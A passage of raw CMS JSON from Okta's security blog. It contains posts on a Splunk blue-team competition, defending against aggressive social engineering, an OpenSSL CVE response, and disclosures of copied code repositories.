"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg"},"name":"David Bradbury","jobTitle":"Chief Security Officer","slug":"david-bradbury","node_locale":"en"}]},{"slug":"/BOTS2023","id":"192188d0-ff6c-5225-9344-103bf229c0d9","title":"Study up on Okta Logs for Splunk’s Boss of the SOC!","date":"2023-07-06T07:21:51+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Security is pleased to announce another collaboration with our friends at Splunk - our security teams have joined forces to come up with a range of Okta-relevant scenarios for this year’s “Boss of the SOC'' competition at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://conf.splunk.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Splunk .conf23\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Per Splunk,\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"blockquote\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"“Boss of the SOC (BOTS) is a blue-team capture the flag-esque competition. As a contestant, you will explore and investigate realistic event data in Splunk Enterprise and Splunk Enterprise Security. The questions in BOTS range from easy to hard and everything in between. Every question comes with hints to nudge you in the right direction. If you need more help, coaches are onsite and online to assist when the hints run out. Also — don't forget — BOTS is a team sport, so if you bring your crew, you won't be alone.\\\"\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"This means that events from the Okta System Log will be relevant to several challenges. While the Okta Security team doesn’t have first-hand knowledge of what the challenges will include (Splunk keeps that close to their chest), we can suggest a few resources to get a better handle on Okta System Log:\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"unordered-list\",\"content\":[{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta's \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event Type Reference\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" docs at developer.okta.com\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Blog post: \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/02/user-sign-and-recovery-events-okta-system-log\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"User Sign-in and Recovery Events in Okta System Log\",\"marks\":[],\"data\":{}}]}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Blog Post: \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/shareddetections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta and Splunk Combine to Detect Common Attacks\",\"marks\":[],\"data\":{}}]}],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"We’d also like to invite you, in either your physical or virtual form, to view “\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://conf.splunk.com/sessions.html?search=okta#/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"SEC1747B - If You Give an Adversary a Cookie…\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"”, where Okta’s Matt Egan and Splunk’s James Brodsky will showcase our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/shareddetections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"shared detections\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" as well as insights from our “Boss of the SOC” collaboration.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"We wish all participants the best of luck!\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"PS - Did you know \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Reports/log-streaming/about-log-streams.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Log Streaming\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" is now globally available? Log Streaming enables admins to more easily and securely send System Log events to Amazon EventBridge or Splunk Cloud in real-time with simple, pre-built connectors. No Admin API token required!\",\"marks\":[],\"data\":{}}],\"data\":{}}]}"},"summary":null,"updatedAt":"2024-06-07T03:39:23.321Z","secAuthor":[{"id":"b006f4e2-a177-55cd-a2ee-ff041e6ece35","bio":{"bio":"John leads the EMEA node of Okta's Detection and Response Engineering team.
\n\nHis team develops detections and supplementary automations to protect Okta from threat actors, which in turn inform our rotational response and threat hunting missions.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/3156PfzPum7cu577jTvWv5/fda95a934e6567e0d6f41e6ce1da8c56/johnmurphy.jpg"},"name":"John Murphy","jobTitle":"Manager, Defensive Cyber Operations (EMEA)","slug":"john-murphy","node_locale":"en"},{"id":"9e460982-03d4-534b-9941-c9f366f4daea","bio":{"bio":"Prior to joining Okta recently as a Senior Communications Manager, Laremy Legel worked for Amazon Web Services (AWS). Upon joining AWS in 2014, he delivered communications on topics such as Zero Trust, Defense in Depth, Confidential Computing, and global privacy regulations. After bringing two services to market (AWS Artifact and Amazon Macie), Laremy transitioned to assist the CISO of AWS and co-founded the first dedicated cloud security conference, AWS re:Inforce, in 2019.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/7EyNo4FLumgJTEON0drsXj/c2bfaa5f68c62faa9138c6163bc86914/LL.jpg"},"name":"Laremy Legel","jobTitle":"Senior Manager, Security Communications","slug":"laremy-legel","node_locale":"en"}]},{"slug":"/articles/2023/07/social-engineering-getting-more-extreme-fixes-can-be-simple","id":"a089c614-4a71-51f6-86d0-82d1aa3da19e","title":"Social Engineering is Getting More Extreme, but the Fixes Can Be Simple","date":"2023-07-19T18:14:39+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Social engineering is a hacking technique older than the internet itself, and it's tempting to think you've already seen it all. But recently, we've noted a trend among threat actors pursuing more sophisticated and aggressive techniques to trick, or even threaten, users into performing their desired actions. Their campaigns are convincing, brazen, and at times alarming. In this blog post, we want to talk about some of the techniques we've seen (or been made aware of) and provide some practical advice that you can use to defend your employees and organizations.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"First off, you should note that the days of bad movie villain accents and emails filled with blatant typos from far flung international princes are coming to an end. Those attempting to breach systems are now proficient in corporate lingo and they put in the time and research to sound as authentic as the person at the desk next to you. You can expect them to know your internal tools, terminology and name drop your fellow employees with ease. This is the “confidence” portion of any confidence scam, the person on the other end of the line needs to make you feel like they have all the answers, and they need your help, immediately. And it’s this sense of “immediacy” that most social engineering attempts are going to rely on, preying on your desire to be helpful.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Imagine yourself on the end of this call:\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"blockquote\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"“Quick do this for us, install this, we don’t have time to ask questions, hurry!”\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Minutes later, you’ve given up a password, login, or access to your system because you were pressured to do so. As you hang up the phone, you get a weird feeling, that little tingle in the back of your brain that tells you something was “off” about the entire interaction ...\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Before we get to our advice on this front, let’s review another real-life scenario we’ve seen play out. This is the tale of the business networking site, and we’ll place you in the mind of the intended target.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Just imagine, it’s a rainy day, and you’re on LinkedIn looking into what your current and past colleagues are doing for work these days. You’re browsing the site when you receive a message from someone you used to work with.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"blockquote\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"“Hey,” they lead off their message with, “I’ve heard through the rumor mill that you’re being investigated. I personally told them there’s no way, you’re too honest, but I just wanted to warn you that you might hear from the security team!”\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"You push the chair back from your desk, massively confused. Investigated? For what? You left that company months ago. You search your memory, trying to recall your relationship to the person who just messaged you, as well as what on Earth they might be talking about. Then an email arrives in your personal inbox, and this time from someone identifying themselves as security where you used to work, and it includes a link to a document for you to sign too, an NDA.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"blockquote\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"“Can you please give me a call? We have some questions we’d like to ask you.”\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Frightened and concerned, you pick up your mobile device and dial. Now you're way more than halfway down the rabbit hole of granting someone access to your information. You’re clicking links, interacting with the adversary, and moving right down the path of a poor outcome.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"The above hypothetical is in fact a real situation, and one that’s gaining popularity with bad actors. The social engineer has established a convincing pretext, and naturally you don't want to seem dishonest or evasive.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"And when you consider the tools they're using, you know DocuSign, where the NDA .pdf came through, and you’re on LinkedIn all the time. We've also seen threat actors \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"leveraging GitHub\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" as well. What you’re not taking into account is that the adversary in question has credentialed themselves through your prior co-workers account, with a username and password they could easily have attained through a data leak. Then they’ve set themselves up for step two, the contact phase, prepping your mind to accept their version of events and motivating you to clear your good name.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"The adversary hasn't given you a moment to stop and think about where this is coming from, and why a previous employee would reach out to you via a third party. By not giving you the time to pause and ask questions, they’ve also created a false sense of urgency. Of course you want to be helpful, so you don’t mind talking to security, because what do you have to hide? You’re innocent! But this desire to demonstrate your innocence, combined with a series of carefully fabricated events designed to place you on the defensive, can only lead to a poor outcome for you - and your employer.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Now let’s turn our attention to an even more cruel method of exploitation, threatening your loved ones. You receive a call at your desk at noon on a Thursday, and the voice on the other end of the line says they have your cousin Ali, and if you don’t do exactly as they say there’s going to be trouble. You’re shaken, and you ask what they could possibly want?\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"blockquote\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"“Just install the software I’m emailing you and everything will be fine.”\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"You double click a few times and they hang up. Wait, what just happened? Is your cousin safe?\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Of course, the idea of social engineering itself isn’t new or novel. We’ve written about \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/scatterswine\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"these types of activities in the past\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", and we’ve seen widespread messaging of employees (and even family members of employees) in the past.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"However, the current landscape indicates that threat actors are rapidly escalating both the level of their threats and the intimacy of their claims. Take a moment and consider the amount of information about you that is already out in the world. Are you on social media? The aforementioned business networking sites? Message boards? Ever applied for a business license or had personal information involved in a data breach? There are an incredible variety of ways to interact with the internet, and we do them all, but because of that it can be easy to form a composite of what’s important to us, as well as our specific connection to friends and family. Which is exactly the type of information that sophisticated adversaries will use to apply pressure and instill urgency. It’s this sense of urgency and intimacy that you should be aware of going forward.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Thus concludes the, “you wouldn’t believe the things we’ve seen” portion of this article. Now let’s talk about the steps you and your company can take to avoid these types of interactions, with the positive news being that the fixes are readily available and easy to implement. The fixes here aren’t hard, won’t require millions of dollars, and can lead to easy wins. The methods we’ve described are attempts at getting past your intrusion detection. Culturally, there are steps that you can take to build an environment that’s less likely to be a victim of social engineering.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"heading-3\",\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Anticipate the adversary\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"You should expect and anticipate that adversaries will attempt to imitate the service or IT support desk. As such, what can enterprises do to differentiate the help desk from any random caller? Can your employees research who they are talking to on a company intranet? Can they ask to call the person back at the number that’s provided on your internal support pages? Every company is different - the information available to your employees will be different and therefore the processes you recommend will be too, but companies should have a defined verification process that their user base can leverage when IT support or security staff reach out to them. We don’t need people to become paranoid, but a mindset of ‘trust, but verify’ best practices for verification of callers (call back by known helpdesk number, visual match against org directory, etc.) can improve your security posture.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"heading-3\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2. Have well-known procedures\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"In turn, it's important that the security and IT teams collaborate on an agreed process for safely providing remote support to users, and an unwavering commitment to following that process. Your security awareness program needs to communicate and set expectations to users on how they can validate the identity of helpdesk or security staff. It’s also worth considering having a security program where you’re not asking people to download software overall.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"heading-3\",\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Security culture matters\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Speaking of security awareness: never “punish” a user for asking questions of security or support teams. Instead, build a culture of security awareness and curiosity to encourage a healthy skepticism in your users. At this point, we know that adversaries have playbooks, including full scripts, on how to manipulate unsuspecting users into giving them information they can use. The culprits in this situation want the entire scheme to proceed quickly, without anyone having time to ask questions. Tell your users it’s okay to slow things down if they don’t understand what’s happening. Remember there is a power dynamic at play here, an emotional one, but when someone is asking you to do something you have the power in this situation, not them. Furthermore, you should encourage your security people to want to have conversations with everyday users, as well as having a photo and a phone number associated with their internal work profile.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"heading-3\",\"content\":[{\"nodeType\":\"text\",\"value\":\"4. All hands on deck!\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Encourage and reward your employees for reporting social engineering attempts. They can be your eyes and ears, and an early warning system. Many organizations today have defined processes for reporting phishing emails, but do your people know that they should - and more importantly, know how to - report the types of approaches that we’ve talked about here today? Such attempts should be reported as soon as possible. And upon receiving such reports, your security team should work with other relevant parts of your business to ensure that your processes and advice to employees is sufficient for whatever the next creative permutation of these types of aggressive social engineering approaches looks like.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"heading-3\",\"content\":[{\"nodeType\":\"text\",\"value\":\"5. Downvote downloads\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Your security awareness program should make users skeptical of downloading software to their endpoint. Getting concepts like this out to your employee base could make all the difference. And if you can, consider locking down your environment overall, outside of a limited set endorsed for use by support/IT teams by blocking all remote management and monitoring (RMM) tools.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"We should expect that in a well-configured environment, attackers will resort to more extreme variations of social engineering. We’re seeing variations on the above themes all the time. Which is why we all need to be extremely intentional about how we respond to requests, no matter who they appear to be from, or how urgent they may seem. There is no \\\"one size fits all\\\" solution here. Every company is different, and the information available to your employees will be different and therefore the processes you recommend will be too. The main takeaway? Make your people aware, because improved security awareness tends to leads to improved security results.\",\"marks\":[],\"data\":{}}],\"data\":{}}]}"},"summary":null,"updatedAt":"2024-06-07T03:39:23.106Z","secAuthor":[{"id":"94fa25fb-5f59-5711-92cc-f79d533ee5e2","bio":{"bio":"Tim Peel leads Cyber Threat Research within Okta's cyber defence team.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/3VRUhNsn36rqnvpTCbIgnM/c7b494d1e58fd50e1495da6876a8a450/TP_profile_photo.jpg"},"name":"Tim Peel","jobTitle":"Director, Cyber Threat Research","slug":"tim-peel","node_locale":"en"},{"id":"9e460982-03d4-534b-9941-c9f366f4daea","bio":{"bio":"Prior to joining Okta recently as a Senior Communications Manager, Laremy Legel worked for Amazon Web Services (AWS). Upon joining AWS in 2014, he delivered communications on topics such as Zero Trust, Defense in Depth, Confidential Computing, and global privacy regulations. After bringing two services to market (AWS Artifact and Amazon Macie), Laremy transitioned to assist the CISO of AWS and co-founded the first dedicated cloud security conference, AWS re:Inforce, in 2019.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/7EyNo4FLumgJTEON0drsXj/c2bfaa5f68c62faa9138c6163bc86914/LL.jpg"},"name":"Laremy Legel","jobTitle":"Senior Manager, Security Communications","slug":"laremy-legel","node_locale":"en"}]},{"slug":"/2022-OpenSSL","id":"b9fcbb1f-31a9-5d0c-958b-721757021dfb","title":"Okta’s Response to OpenSSL Security Update","date":"2022-11-01T03:59:25+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"The OpenSSL Project has announced the availability of a security update (version 3.07) that addresses a vulnerability affecting OpenSSL versions 3.0 and above (3.0.0 - 3.0.6).\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"The two CVE’s are listed below:\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"unordered-list\",\"content\":[{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.openssl.org/news/secadv/20221101.txt\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"CVE-2022-3602\",\"marks\":[],\"data\":{}}]}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.openssl.org/news/secadv/20221101.txt\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"CVE-2022-3786\",\"marks\":[],\"data\":{}}]}],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"heading-2\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Response\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s engineering teams have applied patches and other mitigations, where required.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"heading-2\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Customer Guidance\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"For both CVEs, the severity level has been listed as “high” and the following information has been made available:\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"unordered-list\",\"content\":[{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"OpenSSL versions 3.0.0 to 3.0.6 are vulnerable.\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"OpenSSL 3.0 users should upgrade to OpenSSL 3.0.7.\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"OpenSSL 1.1.1 and 1.0.2 are not affected.\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has assessed that Version 2022.10.0 of the Okta Access Gateway uses an impacted version of OpenSSL. Please see \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://trust.okta.com/security-advisories/okta-access-gateway-advisory-cve-2022-3602-and-cve-2022-3786/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"our advisory\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Update\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": OAG version 2022.11.0 is now available with an updated version of OpenSSL 3.0.7.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"heading-2\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Changelog\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"unordered-list\",\"content\":[{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"December 1, 2022, 01:37 UTC - updated to reflect patches and mitigations have been applied.\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"November 4, 2022, 23:36 UTC - Updated to reflect new OAG version available.\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"November 1, 2022, 03:59 UTC - A previous version of this post noted that the OpenSSL Project evaluated one of the vulnerabilities as “Critical”. This has since been downgraded by OpenSSL to “High”.\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}}],\"data\":{}}]}"},"summary":null,"updatedAt":"2024-06-07T03:38:57.420Z","secAuthor":[{"id":"1e934185-d220-5cf6-915f-afe21369ab6b","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta","jobTitle":"","slug":"okta","node_locale":"en"}]},{"slug":"/articles/2022/12/okta-code-repositories","id":"acb9d8ba-151a-5a07-888a-bee7a9ea3ceb","title":"Okta Code Repositories","date":"2022-12-21T17:09:19+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"SUMMARY\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": In alignment with our core value of transparency, we are sharing context and details around a recent security event affecting Okta code repositories. There is no impact to any customers, including any HIPAA, FedRAMP or DoD customers. No action is required by customers.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"SCOPE\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": The security event detailed below pertains to Okta Workforce Identity Cloud (WIC) code repositories. It does not pertain to any Auth0 (Customer Identity Cloud) products.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"EVENT\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": In early December 2022, GitHub alerted Okta about possible suspicious access to Okta code repositories. Upon investigation, we have concluded that such access was used to copy Okta code repositories.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Our investigation concluded that there was no unauthorized access to the Okta service, and no unauthorized access to customer data. Okta does not rely on the confidentiality of its source code for the security of its services. The Okta service remains fully operational and secure.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"As soon as Okta learned of the possible suspicious access, we promptly placed temporary restrictions on access to Okta GitHub repositories and suspended all GitHub integrations with third-party applications.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"We have since reviewed all recent access to Okta software repositories hosted by GitHub to understand the scope of the exposure, reviewed all recent commits to Okta software repositories hosted with GitHub to validate the integrity of our code, and rotated GitHub credentials. We have also notified law enforcement.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"We have decided to share this information consistent with our commitment to transparency and partnership with our customers.\",\"marks\":[],\"data\":{}}],\"data\":{}}]}"},"summary":null,"updatedAt":"2024-06-07T03:38:57.390Z","secAuthor":[{"id":"1e934185-d220-5cf6-915f-afe21369ab6b","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta","jobTitle":"","slug":"okta","node_locale":"en"}]},{"slug":"/articles/2022/09/auth0-code-repository-archives-2020-and-earlier","id":"d0c8ad99-a404-51ac-a5fc-31ad1d41370a","title":"Auth0 Code Repository Archives From 2020 and Earlier","date":"2022-09-26T12:39:34+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Notification of Auth0 Code Repository Archives Security Event - \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"No Customer Action Required, Auth0 Fully Operational\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"In alignment with our core value of transparency, we are communicating about a recent security event related to certain Auth0 archival code repositories; there is no impact to customer data. This does not impact any other Okta products.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/blog/auth0-code-repository-archives-from-2020-and-earlier/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Read 